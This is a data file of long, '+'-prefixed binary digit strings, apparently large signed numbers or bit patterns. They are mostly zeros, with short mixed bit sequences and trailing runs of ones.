+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011001000110010011110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010100110101011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000110101011000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000010111000001010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000101110110110101111111111111111111111111111111111111111111111111 